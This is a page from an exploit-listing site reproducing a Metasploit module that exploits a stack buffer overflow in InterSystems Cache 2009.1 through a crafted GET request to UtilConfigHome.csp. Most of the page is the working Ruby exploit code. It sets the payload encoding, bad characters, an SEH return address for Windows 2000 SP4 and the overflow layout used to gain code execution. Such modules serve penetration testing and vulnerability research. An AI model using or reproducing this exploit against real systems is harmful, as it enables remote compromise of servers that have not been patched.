Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
Cache
by:
MC
7.5
CVSS
HIGH
Stack Buffer Overflow
CWE
Product Name: Cache
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2010

InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow

This module exploits a stack buffer overflow in InterSystems Cache 2009.1. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.

Mitigation:

Source

Exploit-DB raw data:

##
# $Id: intersystems_cache.rb 9797 2010-07-12 23:25:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	# XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in InterSystems Cache 2009.1.
				By sending a specially crafted GET request, an attacker may be able to execute
				arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9797 $',
			'References'     =>
				[
					[ 'OSVDB', '60549' ],
					[ 'BID', '37177' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 650,
					'BadChars' => "\x00\x3a\x26\x3f\x0c\x25\x23\x20\x0a\x0d\x09\x2f\x2b\x2e\x0b\x5c",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Offset' => 710, 'Ret' => 0x6ff2791a } ], # libhttpd.dll 2.2.11.0 / pop ebp | pop ebx | ret
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Sep 29 2009')) # Initially...!

		register_options( [ Opt::RPORT(57772) ], self.class )
	end

	def exploit
		# offset to the seh frame.
		sploit =   payload.encoded + rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
		# jmp $+6 | p/p/r
		sploit <<  Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V')
		# fall into some nops, jmp back to our final payload.
		sploit <<  make_nops(8) + [0xe9, -700].pack('CV')
		# cause the av!
		sploit <<  rand_text_alpha_upper(payload.encoded.length)

		print_status("Trying target #{target.name}...")

		send_request_raw({
				'uri'          => '/csp/sys/mgr/UtilConfigHome.csp=' + sploit,
				'method'       => 'GET',
			}, 5)

		handler
	end
end